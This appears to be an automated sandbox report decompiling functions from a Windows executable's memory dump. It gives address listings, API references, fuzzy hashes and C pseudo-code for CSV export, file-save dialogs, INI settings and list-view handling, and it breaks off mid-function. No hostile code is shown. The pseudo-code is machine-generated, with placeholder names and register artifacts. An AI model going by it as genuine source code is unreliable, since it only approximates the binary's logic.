Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 2574300362-880857682
Opcode ID: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
Instruction ID: 122d2585c685c0691ad6c3d54d7046cb00117d102b384f1c3bcadfb2245e5d9f
Opcode Fuzzy Hash: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
Instruction Fuzzy Hash: 5ED0C9F0A59300AAD720AF65AE097923AA4AB40713F149576E804F12B0D7B881C8CE6C

Uniqueness

Uniqueness Score: -1.00%

Function 00408885, Relevance: 6.1, APIs: 4, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00408885(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				wchar_t* _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				wchar_t* _t63;
				wchar_t* _t64;
				void* _t68;
				void* _t69;
				intOrPtr* _t71;
				wchar_t* _t79;
				wchar_t* _t83;

				_t68 = __ebx;
				_t79 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t68 + 0x38)) + _v8 * 4);
						_t71 = _a8;
						if(_t71 != _t79) {
							_t83 =  *((intOrPtr*)( *_t71))(_t39,  *((intOrPtr*)(_t68 + 0x68)));
						} else {
							_t83 =  *( *((intOrPtr*)(_t68 + 0x2e4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t83, 0x2c);
						_pop(_t69);
						if(_t41 != 0) {
							L10:
							_v36 = _t79;
							_v32 = _t79;
							_v28 = _t79;
							_v20 = 0x100;
							_v24 = 1;
							_v16 = 0x22;
							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t83 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t81 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E004063DD(_t48, _t69, _t81, __eflags);
								_t83 =  &(_t83[0]);
								__eflags = _t83;
							}
							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
							_t53 = _v36;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40f454;
							}
							E00408857(_t68, _t69, _a4, _t53);
							E00406355( &_v36);
							_t79 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t83, 0x22);
							_pop(_t69);
							if(_t62 != 0) {
								goto L10;
							} else {
								_t63 = wcschr(_t83, 0xd);
								_pop(_t69);
								if(_t63 != 0) {
									goto L10;
								} else {
									_t64 = wcschr(_t83, 0xa);
									_pop(_t69);
									if(_t64 != 0) {
										goto L10;
									} else {
										E00408857(_t68, _t69, _a4, _t83);
									}
								}
							}
						}
						if(_v8 <  *((intOrPtr*)(_t68 + 0x34)) - 1) {
							E00408857(_t68, _t69, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t68 + 0x34)));
				}
				return E00408857(_t68, _t69, _a4, L"\r\n");
			}

0x00408885
0x0040888c
0x00408891
0x00408894
0x0040889b
0x004088a1
0x004088a4
0x004088a9
0x004088c2
0x004088ab
0x004088b4
0x004088b4
0x004088c7
0x004088cf
0x004088d0
0x0040890c
0x0040890f
0x00408912
0x00408915
0x0040891f
0x00408926
0x0040892d
0x00408934
0x00408959
0x00408959
0x0040895c
0x0040895f
0x00408962
0x00408965
0x00000000
0x00000000
0x0040893b
0x0040893f
0x0040894e
0x00408951
0x00408951
0x00408941
0x00408941
0x00408946
0x00408946
0x00408952
0x00408958
0x00408958
0x00408958
0x0040896e
0x00408973
0x00408976
0x00408978
0x0040897a
0x0040897a
0x00408985
0x0040898d
0x00408992
0x00408992
0x004088d2
0x004088d5
0x004088dd
0x004088de
0x00000000
0x004088e0
0x004088e3
0x004088eb
0x004088ec
0x00000000
0x004088ee
0x004088f1
0x004088f9
0x004088fa
0x00000000
0x004088fc
0x00408902
0x00408902
0x004088fa
0x004088ec
0x004088de
0x0040899b
0x004089a7
0x004089a7
0x004089ac
0x004089b2
0x004089bb
0x004089cd

APIs

wcschr.MSVCRT ref: 004088C7
wcschr.MSVCRT ref: 004088D5
wcschr.MSVCRT ref: 004088E3
wcschr.MSVCRT ref: 004088F1

Part of subcall function 004063DD: wcslen.MSVCRT ref: 004063F9
Part of subcall function 004063DD: memcpy.MSVCRT ref: 0040641C

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcschr$memcpywcslen
String ID:
API String ID: 1983396471-0
Opcode ID: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
Instruction ID: 891d09ae9378dccf635ba886e12c54397b7589aa880eb7d9b0c0a307a2786e7e
Opcode Fuzzy Hash: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
Instruction Fuzzy Hash: 5B41B431900214ABDF10FEA5C941AAE7BB8EF04328F50853FF891F72C2DB7899458A59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A084, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040A084(void* __eax, void* __eflags, wchar_t* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				signed int _t57;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				void* _t76;
				signed int _t80;
				wchar_t* _t91;
				void* _t92;
				void* _t94;
				void* _t95;

				_t76 = __eax;
				E00407A66(__eax, __eflags);
				_v12 = 0;
				_t57 = 0;
				while(1) {
					_t91 = _a4;
					if(( *(_t91 + _t57 * 2) & 0x0000ffff) + 0xffffffd0 > 9) {
						break;
					}
					_t57 = _t57 + 1;
					if(_t57 < 1) {
						continue;
					}
					_t71 = wcslen(_t91);
					if(_t71 >= 3) {
						break;
					}
					_push(_t91);
					L0040E062();
					if(_t71 >= 0 && _t71 <  *((intOrPtr*)(_t76 + 0x34))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t76 + 0x38)) + _t71 * 4) * 0x14 +  *((intOrPtr*)(_t76 + 0x2e4))));
					}
					L19:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t80 =  *0x4131d4; // 0x1
					_t58 = _v12;
					 *0x4131d4 =  *0x4131d4 + 1;
					 *((intOrPtr*)(0x4131d8 + _t80 * 4)) = _t58;
					return _t58;
				}
				__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
					L14:
					_t92 = 0;
					__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
					_v8 = 0;
					if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
						goto L19;
					} else {
						goto L15;
					}
					do {
						L15:
						_t60 = E0040546C( *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4)) + 0x10)), _a4);
						_t62 = E0040546C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x48)) + _t92 + 0x10)), _a4);
						_t95 = _t95 + 0x10;
						__eflags = _t60;
						if(_t60 >= 0) {
							L17:
							_v12 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4))));
							goto L18;
						}
						__eflags = _t62;
						if(_t62 < 0) {
							goto L18;
						}
						goto L17;
						L18:
						_v8 = _v8 + 1;
						_t92 = _t92 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
					} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
					goto L19;
				}
				_t94 = 0;
				__eflags = 0;
				do {
					_push(_a4);
					_t66 =  *((intOrPtr*)(_t76 + 0x2e4));
					_push( *((intOrPtr*)(_t94 + _t66 + 0x10)));
					L0040E03E();
					_push(_a4);
					_t67 =  *((intOrPtr*)(_t76 + 0x48));
					_push( *((intOrPtr*)(_t67 + _t94 + 0x10)));
					L0040E03E();
					_t95 = _t95 + 0x10;
					__eflags = _t66;
					if(_t66 == 0) {
						L11:
						_v12 =  *(_t94 +  *((intOrPtr*)(_t76 + 0x2e4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t67;
					if(_t67 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t94 = _t94 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
				} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L19;
				}
				goto L14;
			}

0x0040a08d
0x0040a08f
0x0040a096
0x0040a099
0x0040a09b
0x0040a09b
0x0040a0a9
0x00000000
0x00000000
0x0040a0ab
0x0040a0af
0x00000000
0x00000000
0x0040a0b2
0x0040a0bb
0x00000000
0x00000000
0x0040a0bd
0x0040a0be
0x0040a0c6
0x0040a0e7
0x0040a0e7
0x0040a1af
0x0040a1b6
0x0040a1b8
0x0040a1b8
0x0040a1bf
0x0040a1c5
0x0040a1c8
0x0040a1ce
0x0040a1d6
0x0040a1d6
0x0040a0ef
0x0040a0f5
0x0040a0f8
0x0040a0fb
0x0040a157
0x0040a157
0x0040a159
0x0040a15f
0x0040a162
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a164
0x0040a164
0x0040a171
0x0040a182
0x0040a187
0x0040a18a
0x0040a18c
0x0040a192
0x0040a19b
0x00000000
0x0040a19b
0x0040a18e
0x0040a190
0x00000000
0x00000000
0x00000000
0x0040a19e
0x0040a19e
0x0040a1a4
0x0040a1a7
0x0040a1a7
0x00000000
0x0040a164
0x0040a0fd
0x0040a0fd
0x0040a0ff
0x0040a0ff
0x0040a102
0x0040a108
0x0040a10c
0x0040a111
0x0040a116
0x0040a119
0x0040a11d
0x0040a122
0x0040a125
0x0040a127
0x0040a12d
0x0040a136
0x0040a139
0x00000000
0x0040a139
0x0040a129
0x0040a12b
0x00000000
0x00000000
0x00000000
0x0040a140
0x0040a140
0x0040a146
0x0040a149
0x0040a149
0x0040a151
0x0040a155
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E

wcslen.MSVCRT ref: 0040A0B2
_wtoi.MSVCRT ref: 0040A0BE
_wcsicmp.MSVCRT ref: 0040A10C
_wcsicmp.MSVCRT ref: 0040A11D

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmp$??2@??3@_wtoiwcslen
String ID:
API String ID: 1549203181-0
Opcode ID: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
Instruction ID: 173153ae92e8ec93863a9f5982dcfa1c11e383f1bf25a9e136d2eac58130d476
Opcode Fuzzy Hash: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
Instruction Fuzzy Hash: D2415C31900304AFCB21DF69C580A9EBBB4EF44355F1444BAEC05EB396D678DAA18B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB6E, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AB6E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				char* _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char* _v76;
				char _v80;
				void _v2126;
				signed short _v2128;
				void* __ebx;
				void* __edi;
				char _t32;
				intOrPtr _t33;
				char _t34;
				intOrPtr _t38;
				signed short _t57;
				char* _t62;
				char* _t64;

				_v2128 = _v2128 & 0x00000000;
				memset( &_v2126, 0, 0x7fe);
				_t32 =  *((intOrPtr*)(L"txt")); // 0x780074
				_v16 = _t32;
				_t33 =  *0x410294; // 0x74
				_v12 = _t33;
				_t34 = E00406827(0x1f5);
				_t64 = L"*.txt";
				_v80 = _t34;
				_v76 = _t64;
				_v72 = E00406827(0x1f6);
				_v68 = _t64;
				_v64 = E00406827(0x1f7);
				_v60 = L"*.json";
				_v56 = E00406827(0x1fb);
				_v52 = L"*.csv";
				_t38 = E00406827(0x1f8);
				_t62 = L"*.htm;*.html";
				_v48 = _t38;
				_v44 = _t62;
				_v40 = E00406827(0x1f9);
				_v36 = _t62;
				_v32 = E00406827(0x1fa);
				_v28 = L"*.xml";
				_v24 = E00406827(0x1fc);
				_v20 = _t64;
				E00406050( &_v2128,  &_v80);
				_t57 = 7;
				return E00405DCD(_a12,  *((intOrPtr*)(_a4 + 0x208)), _a8,  &_v2128, E00406827(_t57),  &_v16);
			}

0x0040ab77
0x0040ab90
0x0040ab95
0x0040ab9a
0x0040ab9d
0x0040abaa
0x0040abad
0x0040abb2
0x0040abb8
0x0040abbb
0x0040abc8
0x0040abcb
0x0040abd6
0x0040abd9
0x0040abea
0x0040abed
0x0040abf4
0x0040abf9
0x0040abff
0x0040ac02
0x0040ac0f
0x0040ac12
0x0040ac1d
0x0040ac20
0x0040ac2c
0x0040ac39
0x0040ac3c
0x0040ac44
0x0040ac71

APIs

memset.MSVCRT ref: 0040AB90

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

Part of subcall function 00406050: memset.MSVCRT ref: 00406071
Part of subcall function 00406050: _snwprintf.MSVCRT ref: 0040609F
Part of subcall function 00406050: wcslen.MSVCRT ref: 004060AB
Part of subcall function 00406050: memcpy.MSVCRT ref: 004060C3
Part of subcall function 00406050: wcslen.MSVCRT ref: 004060D1
Part of subcall function 00406050: memcpy.MSVCRT ref: 004060E4

Part of subcall function 00405DCD: GetSaveFileNameW.COMDLG32(?), ref: 00405E1C
Part of subcall function 00405DCD: wcscpy.MSVCRT ref: 00405E33

Strings

*.htm;*.html, xrefs: 0040ABF9
txt, xrefs: 0040AB95
*.txt, xrefs: 0040ABB2

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
String ID: *.htm;*.html$*.txt$txt
API String ID: 1392923015-1706329710
Opcode ID: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
Instruction ID: 6a1f0fe5a8f9a0d06c10808573add6bd6f8ed95605c5985f6cf117c7f3196cfa
Opcode Fuzzy Hash: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
Instruction Fuzzy Hash: 5C215EB2D0121A9FCB40EF96D885ADDBBB4FF04308F10807BE409B7281DB7859418F99

Uniqueness

Uniqueness Score: -1.00%

Function 00406613, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406613(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040E038();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040E032();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

0x00406613
0x00406614
0x00406614
0x00406617
0x0040661b
0x0040662e
0x0040662e
0x00406632
0x00406634
0x0040663a
0x0040663b
0x0040663e
0x00406647
0x00406648
0x0040664d
0x00406657
0x00406659
0x0040665e
0x00406665
0x0040666f
0x00406671
0x00406672
0x00406677
0x0040667e
0x00406687
0x0040661d
0x0040661d
0x0040661f
0x00406621
0x00406626
0x00406627
0x0040662a
0x0040662c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040662c
0x00406697
0x0040669a
0x004066a3
0x004066a3
0x0040668c
0x00406690

APIs

??2@YAPAXI@Z.MSVCRT ref: 00406648
memset.MSVCRT ref: 00406659
memcpy.MSVCRT ref: 00406665
??3@YAXPAX@Z.MSVCRT ref: 00406672

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: b3bebb2b07f3d72bfc287334a96ab2eb9d003ca0e48cb49cfb9246c624c4ecc5
Instruction ID: 0097541d92ab95bcfef6608398cdc2c51d263adba4e227b481c9d82b5fae792d
Opcode Fuzzy Hash: b3bebb2b07f3d72bfc287334a96ab2eb9d003ca0e48cb49cfb9246c624c4ecc5
Instruction Fuzzy Hash: EB114C716046019FD328DF2DC881A26F7E9EFD8300B218D3EE59A97395DA76E811CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5E8, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E0040D5E8(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040E340(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40f454,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E00405F0A( &_v16392, _t34, _a16);
				} else {
					memset();
					E00405E81(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}

0x0040d5e8
0x0040d5f0
0x0040d5fc
0x0040d601
0x0040d602
0x0040d60f
0x0040d611
0x0040d612
0x0040d647
0x0040d669
0x0040d676
0x0040d67f
0x0040d681
0x0040d614
0x0040d614
0x0040d625
0x0040d643
0x0040d643
0x0040d68d

APIs

memset.MSVCRT ref: 0040D614

Part of subcall function 00405E81: _snwprintf.MSVCRT ref: 00405EC6
Part of subcall function 00405E81: memcpy.MSVCRT ref: 00405ED6

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D63D
memset.MSVCRT ref: 0040D647
GetPrivateProfileStringW.KERNEL32 ref: 0040D669

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
Instruction ID: e5ada5cee961c9ffd84a11649d97ac6ffa4cf685c3efd691eec2e39df5646265
Opcode Fuzzy Hash: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
Instruction Fuzzy Hash: D5118272500119AFDF11AF65DC02E9E7B79EF04704F100476FF09B20A1E6359A649F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402B94, Relevance: 6.1, APIs: 4, Instructions: 53
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B94(struct HWND__* _a4, int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				signed int _v32;
				void _v48;
				void* _v52;
				int _v68;
				intOrPtr _v72;
				signed int _v80;
				int _v92;
				void _v96;
				void* _v100;
				signed int _t34;

				memset( &_v96, 0, 0x2c);
				_v100 = _a12;
				_v80 = _a16;
				_v72 = _a20;
				_v96 = 0;
				_v92 = 0;
				_v68 = 0;
				memset( &_v48, 0, 0x2c);
				_v52 = 4;
				if(SendMessageW(_a4, 0x120b, _a8,  &_v52) != 0) {
					_t34 = _v32 & 0x00000003;
					if(_t34 != 0) {
						_v80 = _v80 & 0xfffffffc | _t34;
					}
				}
				return SendMessageW(_a4, 0x120c, _a8,  &_v100);
			}

0x00402ba8
0x00402bb0
0x00402bb7
0x00402bc0
0x00402bca
0x00402bce
0x00402bd2
0x00402bd6
0x00402bec
0x00402c00
0x00402c06
0x00402c09
0x00402c14
0x00402c14
0x00402c09
0x00402c2e

APIs

memset.MSVCRT ref: 00402BA8
memset.MSVCRT ref: 00402BD6
SendMessageW.USER32(?,0000120B), ref: 00402BFC
SendMessageW.USER32(?,0000120C,?,?), ref: 00402C28

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendmemset
String ID:
API String ID: 568519121-0
Opcode ID: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
Instruction ID: b9af20001e59f3bd0701389c088e4a3ca17ea943e2d6bc3205c17ab3910d7cc1
Opcode Fuzzy Hash: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
Instruction Fuzzy Hash: 61115B72508314ABD711DF14CC0199FBFE8EB89750F004A2AFA64E7290D371DA20CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3BF, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040A3BF(void* __esi) {
				void* _v516;
				long _v1028;
				void* __ebx;
				wchar_t* _t15;
				signed short _t23;
				signed short _t25;
				void* _t29;

				_t29 = __esi;
				_push(E0040778A( *((intOrPtr*)(__esi + 0x69c))));
				_t23 = 4;
				_push(E00406827(_t23));
				_push(0xff);
				_push( &_v516);
				L0040DFD6();
				_t15 = E00407E16( *((intOrPtr*)(__esi + 0x69c)), 0);
				if(_t15 > 0) {
					_push(_t15);
					_t25 = 5;
					_push(E00406827(_t25));
					_push(0xff);
					_push( &_v1028);
					L0040DFD6();
					_t15 = wcscat( &_v516,  &_v1028);
				}
				if( *((intOrPtr*)(_t29 + 0x208)) != 0) {
					return SendMessageW( *(_t29 + 0x214), 0x40b, 0,  &_v516);
				}
				return _t15;
			}

0x0040a3bf
0x0040a3d5
0x0040a3d8
0x0040a3de
0x0040a3ea
0x0040a3eb
0x0040a3ec
0x0040a3fc
0x0040a403
0x0040a405
0x0040a408
0x0040a40e
0x0040a415
0x0040a416
0x0040a417
0x0040a42a
0x0040a42f
0x0040a43b
0x00000000
0x0040a451
0x0040a458

APIs

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

_snwprintf.MSVCRT ref: 0040A3EC
SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040A451

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

_snwprintf.MSVCRT ref: 0040A417
wcscat.MSVCRT ref: 0040A42A

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
String ID:
API String ID: 822687973-0
Opcode ID: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
Instruction ID: d08295fd2af1cf787610e7cf5331bd4bc3d6faa59d3d329b1d8aec9a5db4e45c
Opcode Fuzzy Hash: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
Instruction Fuzzy Hash: 5C01D8B29003096AE720F275CC8AFA773ACAB40318F00447EB71AF10C2D679A9154A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040576B, Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040576B(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}

0x00405789
0x00405791
0x00405795
0x00405798
0x0040579b
0x004057b9
